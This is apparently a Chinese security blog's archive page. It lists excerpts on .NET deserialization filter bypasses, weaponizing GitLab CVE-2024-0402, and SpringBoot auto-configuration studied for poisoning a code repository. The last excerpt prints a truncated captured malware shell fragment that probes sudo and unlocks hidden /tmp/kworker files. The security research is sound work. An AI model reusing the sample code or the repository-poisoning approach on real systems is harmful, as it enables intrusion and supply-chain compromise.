05 2024 档案
摘要:前言:.NET 反序列化SerializationBinder过滤以及绕过 参考文章:https://paper.seebug.org/1927 SerializationBinder SerializationBinder绑定Type类型 SerializationBinder过滤 无效的null
阅读全文
该文被密码保护。
摘要:前言:项目中需要对一个代码仓库进行投毒,该仓库的架构为SpringBoot,这边需要了解和学习下SpringBoot的自动配置编写 参考文章:https://www.cnblogs.com/Bernard94/p/17465592.html 参考文章:https://github.com/jeecg
阅读全文
摘要:前言:Jenkins + Gitlab 实现项目自动化构建及部署笔记 参考文章:https://blog.csdn.net/m0_62999427/article/details/138972368 参考文章:https://blog.csdn.net/weixin_56547063/article
阅读全文
摘要:前言:gitlab的CVE-2024-0402需要用到k8s环境,这边的话通过minikube快速搭建本地k8s环境进行测试和学习的话,顺便记录下minikube的搭建过程 参考文章:https://minikube.sigs.k8s.io/docs/start/ minikube minikube
阅读全文
摘要:前言:记录如何通过git重建同名新分支移除历史commit 场景使用 这种情况可能会发生的比较多,所以这边进行记录下,当我们忘记去掉代码中的一些敏感信息的时候,而推送代码之后就会导致敏感信息一直在代码仓库中进行保留。 上述这种情况,我们应该不允许它出现,要么我们的处理方式一般都是如下两种 第一种方式
阅读全文
摘要:前言:这篇笔记主要记录Gitlab CVE-2024-0402 Devfile解析器任意文件写入及武器化 参考文章:https://gitlab.com/gitlab-org/gitlab/-/issues/437819 参考文章:https://gitlab-com.gitlab.io/gl-se
阅读全文
摘要:前言:分析gitlab的devfile任意文件写入漏洞中看到的,这边进行记录该filepath.Clean函数的特性 参考文章:https://github.com/devfile/registry-support/blob/47b3ffaeadba7babb7075e0576584cfaa3f64
阅读全文
摘要:前言:项目中抓到了个样本,这边进行简单的记录 os=`uname -a | grep el6` if [[ $os = '' ]] then id=`sudo -n id` if [[ $id = '' ]] then chattr -f -i /tmp/kworker /tmp/.kworker
阅读全文